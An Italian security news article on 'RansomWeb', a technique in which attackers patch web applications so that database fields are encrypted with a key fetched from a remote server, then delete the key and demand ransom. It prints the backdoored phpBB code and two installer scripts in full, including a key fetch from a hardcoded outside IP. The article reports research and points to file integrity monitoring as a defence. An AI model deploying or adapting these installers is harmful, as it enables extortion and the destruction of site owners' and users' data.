“RansomWeb” il nuovo vettore di attacco che cripta i database dei siti web

I ricercatori di High-Tech Bridge hanno rilasciato una ricerca sui criminali informatici che criptano i database dei siti web e li trattengono per riscatto con “RansomWeb”

Sempre più persone diventano vittime di ransomware, un malware che cripta i tuoi dati e richiede denaro per decriptarli. Una nuova tendenza sul mercato mostra che i criminali informatici ora prenderanno di mira anche il tuo sito web per ottenere un pagamento di riscatto da te.

Nel dicembre 2014, gli esperti di sicurezza di High-Tech Bridge hanno scoperto un caso molto interessante di compromissione del sito web di una compagnia finanziaria: il sito web era fuori servizio mostrando un errore di database, mentre il proprietario del sito riceveva un’email che chiedeva un riscatto per “decriptare il database”. L’applicazione web in questione era piuttosto semplice e piccola, ma molto importante per il business dell’azienda – l’azienda non poteva permettersi di sospenderla, né di annunciare la sua compromissione. Un’attenta indagine condotta da High-Tech Bridge ha rivelato quanto segue:

• L’applicazione web era stata compromessa sei mesi fa, diversi script del server erano stati modificati per criptare i dati prima di inserirli nel database e per decriptarli dopo aver ottenuto i dati dal database. Una sorta di patching “on-fly” invisibile agli utenti dell’applicazione web.

• Solo i campi più critici delle tabelle del database erano stati criptati (probabilmente per non impattare molto sulle prestazioni dell’applicazione web). Tutti i record del database esistenti in precedenza erano stati criptati di conseguenza.

• La chiave di crittografia era memorizzata su un server web remoto accessibile solo tramite HTTPS (probabilmente per evitare l’intercettazione della chiave da parte di vari sistemi di monitoraggio del traffico).

• Durante sei mesi, gli hacker hanno atteso silenziosamente, mentre i backup venivano sovrascritti dalle versioni recenti del database.

• Nel giorno X, gli hacker hanno rimosso la chiave dal server remoto. Il database è diventato inutilizzabile, il sito web è andato fuori servizio e gli hacker hanno richiesto un riscatto per la chiave di crittografia.

I ricercatori hanno dichiarato di essere certi che si trattasse di un esempio individuale di un sofisticato APT che prendeva di mira una specifica azienda, tuttavia la settimana scorsa hanno affrontato un altro caso simile. Uno dei loro clienti, una PMI, è stata ricattata dopo che il suo… forum phpBB è andato fuori servizio. Il forum era utilizzato come piattaforma principale per il supporto clienti, ed era quindi importante per il cliente.

Era l’ultima versione di phpBB 3.1.2 rilasciata il 25 novembre 2014. Nessun utente poteva accedere (inclusi moderatori e amministratori del forum). Il forum era online, tuttavia tutte le funzioni che richiedevano che l’utente del forum fosse autenticato non funzionavano. La nostra attenta indagine ha rivelato che il motore del forum era stato patchato in modo tale che le password e le email degli utenti venissero criptate “on-fly” tra l’applicazione web e il database.

I seguenti file sono stati modificati:

1. Il file “factory.php” ha la sua funzione “sql_fetchrow()” modificata in modo tale che il risultato della query SQL “$result = $this->get_driver()->sql_fetchrow($query_id);” nell’array “result” avrà valori decriptati dei campi “user_password” e “user_email”:
   if(isset($result[‘user_password’])){
   $result[‘user_password’] = $cipher->decrypt($result[‘user_password’]);
   }
   if(isset($result[‘user_email’])){
   $result[‘user_email’] = $cipher->decrypt($result[‘user_email’]);
   }
2. Il file “functions_user.php” ha una versione modificata della funzione “user_add” per aggiungere la crittografia:
   $sql_ary = array(
   ‘username’=>$user_row[‘username’],
   ‘username_clean’ => $username_clean,
   ‘user_password’ => (isset($user_row[‘user_password’]))?
   $cipher->encrypt($user_row[‘user_password’]):$cipher->encrypt(”),
   ‘user_email’=> $cipher->encrypt(strtolower($user_row[‘user_email’])),
   ‘user_email_hash’=> phpbb_email_hash($user_row[‘user_email’]),
   ‘group_id’ => $user_row[‘group_id’],
   ‘user_type’ => $user_row[‘user_type’],
   );
3. Il file “cp_activate.php” ha una versione modificata della funzione “main()”:
   $sql_ary = array(
   ‘user_actkey’ => ”,
   ‘user_password’ => $cipher->encrypt($user_row[‘user_newpasswd’]),
   ‘user_newpasswd’ => ”,
   ‘user_login_attempts’ => 0,
   );
4. Il file “ucp_profile.php” ha una versione modificata della funzione “main()”:
   if (sizeof($sql_ary))
   {
   $sql_ary[‘user_email’] = $cipher->encrypt($sql_ary[‘user_email’]);
   $sql_ary[‘user_password’] = $cipher->encrypt($sql_ary[‘user_password’]);
   $sql = ‘UPDATE ‘ . USERS_TABLE . ‘
   SET ‘ . $db->sql_build_array(‘UPDATE’, $sql_ary) . ‘
   WHERE user_id = ‘ . $user->data[‘user_id’];
   $db->sql_query($sql);
   }
5. Il file “config.php” ha avuto la seguente modifica:
   class Cipher {
   private $securekey, $iv;
   function __construct($textkey) {
   $this->securekey = hash(‘sha256’,$textkey,TRUE);
   $this->iv = mcrypt_create_iv(32);
   }
   function encrypt($input) {
   return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
   }
   function decrypt($input) {
   return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
   }
   }
   $key=file_get_contents(‘https://103.13.120.108/sfdoif89d7sf8d979dfgf/
   sdfds90f8d9s0f8d0f89.txt’);
   $cipher=new Cipher($key);

Inoltre, i ricercatori hanno trovato due script di installazione di backdoor lasciati dagli hacker sul server che permettono di backdoorare qualsiasi forum phpBB con solo un paio di clic. Il primo installer patcha il file “config.php” per aggiungere la classe “Cipher” che decripta e cripta i dati con la funzione PHP “mcrypt_encrypt()” memorizzando la chiave di crittografia su un server remoto:

$file = ‘../config.php’;
$txt = “ ”.’class Cipher {
private $securekey, $iv;
function construct($textkey) {
$this->securekey = hash(\’sha256\’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\’https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\’);
$cipher=new Cipher($key);’.” ”;
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo “FATTO!”;
};
E il secondo installer analizza tutti gli utenti phpBB esistenti per criptare le loro email e password, e sostituisce i file phpBB sopra menzionati con copie backdoorate:
define(‘IN_PHPBB’, true);
$phpbb_root_path = (defined(‘PHPBB_ROOT_PATH’)) ? PHPBB_ROOT_PATH : ‘../’;
$phpEx = substr(strrchr(FILE__, ‘.’), 1);
include($phpbb_root_path . ‘common.’ . $phpEx);
include($phpbb_root_path . ‘includes/functions_display.’ . $phpEx);
$sql = ‘SELECT user_id, user_password, user_email FROM ‘ . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = ‘UPDATE ‘ . USERS_TABLE . ‘
SET
user_password = “‘.$cipher->encrypt($row[‘user_password’]).’”,
user_email = “‘.$cipher->encrypt($row[‘user_email’]).’”
WHERE user_id = ‘.$row[‘user_id’];
$result2 = $db->sql_query($sql2);
}
echo “SQL AGGIORNATO!
”;
copy(‘factory.php’, ‘../phpbb/db/driver/factory.php’);
copy(‘functions_user.php’, ‘../includes/functions_user.php’);
copy(‘ucp_activate.php’, ‘../includes/ucp/ucp_activate.php’);
copy(‘ucp_profile.php’, ‘../includes/ucp/ucp_profile.php’);
echo “FILE AGGIORNATI!”;

Gli aggressori hanno atteso due mesi e poi hanno semplicemente rimosso la chiave dal server remoto. I ricercatori di High-Tech Bridge hanno successivamente scoperto che phpBB era stato compromesso tramite una password FTP rubata.
Per il momento nessun software antivirus rileva nemmeno gli installer come malware conosciuto:
“step1.php” file
“step2.php” file

Seguendo l’aumento degli attacchi di ransomware, i ricercatori hanno chiamato questa tecnica di hacking “RansomWeb”.

• Proviamo a fare una breve analisi degli attacchi RansomWeb:

• Opportunità Potenziali di RansomWeb:

• Diversamente dagli attacchi DDoS, possono avere un impatto duraturo sulla disponibilità dell’applicazione web.

• Possono essere utilizzati non solo per il ricatto ma per la distruzione a lungo termine del sito web.

• I backup non possono aiutare molto, poiché il database sarà backupato in modalità criptata, mentre la chiave di crittografia è memorizzata in remoto e non sarà backupata.

• Quasi impossibile recuperare dall’attacco senza pagare il riscatto, molte vittime non avranno altra scelta che pagare gli hacker.

• Le aziende di hosting non sono pronte per questa nuova sfida e probabilmente non saranno in grado di aiutare i loro clienti.

I ricercatori hanno anche identificato le Potenziali Debolezze di “RansomWeb” che sono elencate di seguito :

• Può essere facilmente rilevato da un monitor di integrità dei file (tuttavia, poche aziende fanno monitoraggio dell’integrità dei file per le applicazioni web che possono cambiare ogni giorno).

• Piuttosto difficile criptare l’intero database senza danneggiare la funzionalità e/o la velocità dell’applicazione web (tuttavia, anche un solo campo del DB che è irrecuperabile può rovinare un’applicazione web).

• Può essere rilevato piuttosto rapidamente quando utilizzato su un’applicazione web regolarmente aggiornata.

Risorsa : High-Tech Bridge